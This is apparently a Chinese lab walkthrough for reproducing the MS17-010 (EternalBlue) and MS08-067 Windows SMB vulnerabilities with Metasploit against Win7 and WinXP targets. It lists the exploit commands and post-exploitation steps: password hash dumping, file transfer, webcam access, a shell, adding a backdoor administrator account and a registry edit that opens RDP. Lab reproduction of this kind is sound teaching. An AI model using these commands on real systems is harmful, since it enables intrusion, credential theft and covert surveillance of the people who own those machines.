WINDOWS经典漏洞复现

懒得放图了o.O

ms17-010 永恒之蓝

被攻击机版本为win7

信息收集

nmap扫描发现445端口开放,可尝试利用永恒之蓝进行攻击

也就是利用445端口的smb服务实现操作溢出漏洞

利用
  • 启动msf

    msfconsole
  • 查找漏洞模块

    search 17-010
  • 探测是否存在漏洞

    use 3

    选项3为漏洞检测payload

  • 攻击

    use 0

    选项1为漏洞攻击payload

  • 检测和攻击时记得设置被攻击机的IP:

    set rhost 192.168.xxx.xxx
  • 显示主机系统信息

    sysinfo
  • 获取屏幕快照

    screenshot
  • 文件传输

    • 上传文件:

      upload /root/1.txt c:\\
    • 下载文件:

      download c:\\2.jpg /root/2.jpg
  • 查看权限:

    getuid
  • 获取用户名密码:

    run windows/gather/smart_hashdump
  • 摄像头

    • 查看是否存在摄像头

      webcam_list
    • 打开摄像头

      webcam_strean
  • getshell

    直接进入window的命令行

    shell

ms08-067 (CVE-2008-4250) 远程命令执行

MS08-067漏洞是通过MSRPC over SMB通道调用Server服务程序中的NetPathCanonicalize 函数时触发的

详细原理如下https://www.freebuf.com/vuls/203881.html

被攻击机版本为winxp

信息收集

nmap扫描发现445端口开放,可尝试进行RCE

利用漏洞获取权限
  • msf启动

    msfconsole
  • 查找漏洞模块

    search 08-067
  • 调用模块

    use 0
  • 查看需要填写的参数

    show options
  • 填写参数

    set rhost 192.168.xxx.xxx
  • 开始攻击

    run
提权
  • 进入命令行

    shell
  • 创建高权限用户

    net user admin pass /add && net localgroup administrators admin /add

    创建名为admin密码为pass的用户,并提升为管理员权限

远程登录
  • 打开windows远程登录端口,默认3389

    echo reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f > C:\WINDOWS\system32\3389.bat && call 3389.bat
  • 检查端口是否开启

    netstat -an
  • kali再开一个终端进行远程登录

    rdesktop 192.168.xxx.xxx:3389
  • 输入新建的admin和pass即可

  • 关闭3389端口:

    echo reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 11111111 /f > C:\WINDOWS\system32\3389.bat && call 3389.bat